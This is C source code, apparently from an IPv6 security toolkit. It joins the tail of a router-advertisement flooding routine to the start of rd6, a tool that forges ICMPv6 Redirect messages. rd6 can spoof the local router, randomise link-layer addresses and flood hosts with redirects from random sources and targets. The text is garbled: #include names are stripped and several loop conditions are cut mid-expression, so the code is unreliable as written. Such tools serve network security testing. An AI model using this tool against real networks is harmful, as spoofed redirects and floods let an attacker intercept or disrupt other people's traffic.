ND_OPT_PI_FLAG_ONLINK)?"L":""),\ ((prefixflags[i] & ND_OPT_PI_FLAG_AUTO)?"A":""), \ ((prefixflags[i] & ND_OPT_PI_FLAG_RADDR)?"R":""), \ ((!prefixflags[i])?"none":"")); printf("Valid Lifetime: %u Preferred Lifetime: %u\n", prefixvalid[i], prefixpref[i]); } } else{ printf("Flooding the target with %u prefixes\n", nprefixes); printf("Prefix: (randomized)/%u%s Flags: %s%s%s%s ", prefixlen[0], (prefopt_f?"":" (default)"),\ ((prefixflags[0] & ND_OPT_PI_FLAG_ONLINK)?"L":""),\ ((prefixflags[0] & ND_OPT_PI_FLAG_AUTO)?"A":""), \ ((prefixflags[0] & ND_OPT_PI_FLAG_RADDR)?"R":""), \ ((!prefixflags[0])?"none":"")); printf("Valid Lifetime: %u Preferred Lifetime: %u\n", prefixvalid[0], prefixpref[0]); } if(!floodr_f){ for(i=0; i"); if(inet_ntop(AF_INET6, &route[i], pprefix, sizeof(pprefix)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("Prefix: %s/%u Preference: %u Lifetime: %u\n", pprefix, routelen[i], \ (routepref[i]>>3), routelife[i]); } } else{ printf("Flooding the target with %u Route Information options\n", nroutes); printf("Prefix: (randomized)/%u Preference: %u Lifetime: %u\n", routelen[0], \ (routepref[0]>>3), routelife[i]); } if(!floodd_f){ for(i=0;i"); printf("Lifetime: %u Addresses: ", rdnsslife[i]); for(j=0;j * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make rd6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "rd6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); /* Flags used for the ICMPv6 Redirect (specifically) */ unsigned int rediraddr_f=0, redirprefix_f=0, redirport_f=0, peeraddr_f=0, peerport_f=0; unsigned int rhtcp_f=0, rhudp_f=0, rhicmp6_f=0, norheader_f=0, rheader_f=0; unsigned int tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned int icmp6id_f=0, icmp6seq_f=0; unsigned int rhlength_f=0, floodr_f=0, respmcast_f=0, makeonlink_f=0; unsigned int ip6hoplimit_f=0, ip6length_f=0, rhdefault_f=0; unsigned int learnrouter_f=0, sanityfilters_f=0; /* Variables used for ICMPv6 Redirect (specifically) */ u_int16_t ip6length; struct in6_addr rediraddr, peeraddr; unsigned char redirpreflen, targetpreflen; u_int16_t redirport, peerport, tcpurg, tcpwin, icmp6id, icmp6seq; u_int32_t tcpseq, tcpack; u_int8_t tcpflags=0, ip6hoplimit; struct ip6_hdr *rhipv6; struct udp_hdr *rhudp; struct tcp_hdr *rhtcp; struct icmp6_hdr *rhicmp6; unsigned int nredirs, redirs; unsigned int rhbytes, rhlength, currentsize; unsigned char rh_hoplimit; struct nd_opt_rd_hdr *rh; unsigned char rhbuff[100]; /* This one must be able to hold the IPv6 header and the upper layer header */ /* Variables used for learning the default router */ struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct nd_redirect *rd; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; u_int16_t mask; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, targetaddr_f=0, useaddrkey_f=0; unsigned char multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char tllaopt_f=0, tllaopta_f=0, targetprefix_f=0, hoplimit_f=0; unsigned char newdata_f=0, floods_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ int r, sel; fd_set sset, rset; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"add-target-opt", no_argument, 0, 'e'}, {"target-addr-opt", required_argument, 0, 'E'}, {"redir-dest", required_argument, 0, 'r'}, {"redir-target", required_argument, 0, 't'}, {"payload-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'P'}, {"no-payload", no_argument, 0, 'n'}, {"ipv6-hlim", required_argument, 0, 'c'}, {"peer-addr", required_argument, 0, 'x'}, {"redir-port", required_argument, 0, 'o'}, {"peer-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"resp-mcast", no_argument, 0, 'M'}, {"make-onlink", no_argument, 0, 'O'}, {"learn-router", no_argument, 0, 'N'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"sanity-filters", no_argument, 0, 'f'}, {"flood-dests", required_argument, 0, 'R'}, {"flood-targets", required_argument, 0, 'T'}, {"flood-sources", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:eE:r:t:p:P:nc:x:o:a:X:q:Q:V:w:MONj:k:J:K:b:g:B:G:fR:T:F:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=1; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &idata.hsrcaddr, sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &idata.hdstaddr, sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'e': /* Add target link-layer option */ tllaopt_f = 1; break; case 'E': /* Target link-layer option */ tllaopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } nlinkaddr++; tllaopta_f=1; break; case 'r': /* IPv6 Redirected Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Redirected Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &rediraddr) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } rediraddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ redirpreflen = atoi(charptr); if(redirpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&rediraddr, redirpreflen); redirprefix_f=1; } break; case 't': /* Target Address to which traffic will be redirected */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Target Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'p': /* Protocol used in the redirected header */ if(strcmp(optarg, "TCP") == 0) rhtcp_f = 1; else if(strcmp(optarg, "ICMP6") == 0) rhicmp6_f = 1; else if(strcmp(optarg, "UDP") == 0) rhudp_f = 1; else{ puts("Unsupported protocol in option '-p'"); exit(EXIT_FAILURE); } break; case 'P': /* Payload Size*/ rhlength= atoi(optarg); rhlength= (rhlength<<3) >> 3; /* The Redirected Header has a granularity of 8 bytes */ rhlength_f= 1; break; case 'n': /* No Redirected Header */ norheader_f=1; break; case 'c': /* Hop Limit of the IPv6 Payload */ ip6hoplimit= atoi(optarg); ip6hoplimit_f=1; break; case 'x': /* Redirected peer address */ if( inet_pton(AF_INET6, optarg, &peeraddr) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } peeraddr_f = 1; break; case 'o': /* Redir port */ redirport= atoi(optarg); redirport_f= 1; break; case 'a': /* Peer port */ peerport= atoi(optarg); peerport_f= 1; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'M': /* Respond to multicast packets */ respmcast_f=1; break; case 'O': /* Make Destination On-Link */ makeonlink_f=1; break; case 'N': /* Learn Router */ learnrouter_f= 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'f': /* Sanity filters */ sanityfilters_f=1; break; case 'R': /* Flood Redirected */ nredirs= atoi(optarg); if(nredirs == 0){ puts("Invalid number of Redirects in option -R"); exit(EXIT_FAILURE); } floodr_f= 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ idata.listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("rd6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(idata.listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(idata.listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) idata.srcaddr.s6_addr16[i]=0x0000; idata.srcpreflen=64; } if(!floods_f && !idata.srcaddr_f && !learnrouter_f){ puts("Must specify IPv6 Source Address (usually to that of the current default router)"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !idata.listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(!idata.hsrcaddr_f && !learnrouter_f) /* Source link-layer address is randomized by default */ for(i=0; i<6; i++) idata.hsrcaddr.a[i]= random(); if(!idata.hdstaddr_f && idata.dstaddr_f){ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &idata.hdstaddr, sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } if(learnrouter_f){ randomize_ether_addr(&rs_ether); ether_to_ipv6_linklocal(&rs_ether, &rs_ipv6); if(find_ipv6_router(idata.pfd, &rs_ether, &rs_ipv6, &router_ether, &router_ipv6) != 0){ puts("Failed learning default IPv6 router"); exit(EXIT_FAILURE); } if(!idata.hsrcaddr_f){ idata.hsrcaddr= router_ether; idata.hsrcaddr_f=1; } if(!idata.srcaddr_f){ idata.srcaddr= router_ipv6; idata.srcaddr_f= 1; } } release_privileges(); srandom(time(NULL)); if(tllaopt_f && !tllaopta_f){ if(idata.hsrcaddr_f){ /* The value of the target link-layer address */ linkaddr[0] = idata.hsrcaddr; /* option defaults to the Ethernet Source Address */ nlinkaddr++; } else{ puts("Must specify the link-layer Source Address when the '-e' option is selected"); exit(EXIT_FAILURE); } } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ targetaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) targetaddr.s6_addr16[i]=0x0000; targetpreflen=64; } if(!floodt_f && !targetaddr_f){ if(!makeonlink_f){ puts("Must specify Redirect Target Address"); exit(EXIT_FAILURE); } else if(!floodr_f){ targetaddr= rediraddr; targetaddr_f=1; } } /* If the "flood destination" option was set, but no prefix was specified for the "redirected destination", we select random addressses (from ::/0) */ if(floodr_f && !redirprefix_f){ for(i=0;i<8;i++) rediraddr.s6_addr16[i]=0x0000; redirpreflen=0; } if(!floods_f) nsources=1; if(!floodt_f) ntargets=1; if(!floodr_f) nredirs=1; if(sanityfilters_f){ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters while adding sanity filters."); exit(EXIT_FAILURE); } if(learnrouter_f) filters.acceptlinkdst[filters.nacceptlinkdst]= router_ether; else filters.acceptlinkdst[filters.nacceptlinkdst]= idata.hsrcaddr; filters.nacceptlinkdst++; filters.acceptfilters_f=1; if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters while adding sanity filters."); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, "fe80::", &(filters.blocksrc[filters.nblocksrc])) <= 0){ puts("Error while adding sanity filter for link-local addresses."); exit(EXIT_FAILURE); } filters.blocksrclen[filters.nblocksrc] = 16; filters.nblocksrc++; } if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = ETH_DATA_LEN; if(!norheader_f && !(rhtcp_f || rhudp_f || rhicmp6_f)) rhdefault_f=1; if(!ip6hoplimit_f) ip6hoplimit=255; if(!ip6length_f) ip6length=1460; if(!peeraddr_f) peeraddr= idata.dstaddr; if(rhtcp_f || rhdefault_f){ if(!tcpflags_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); 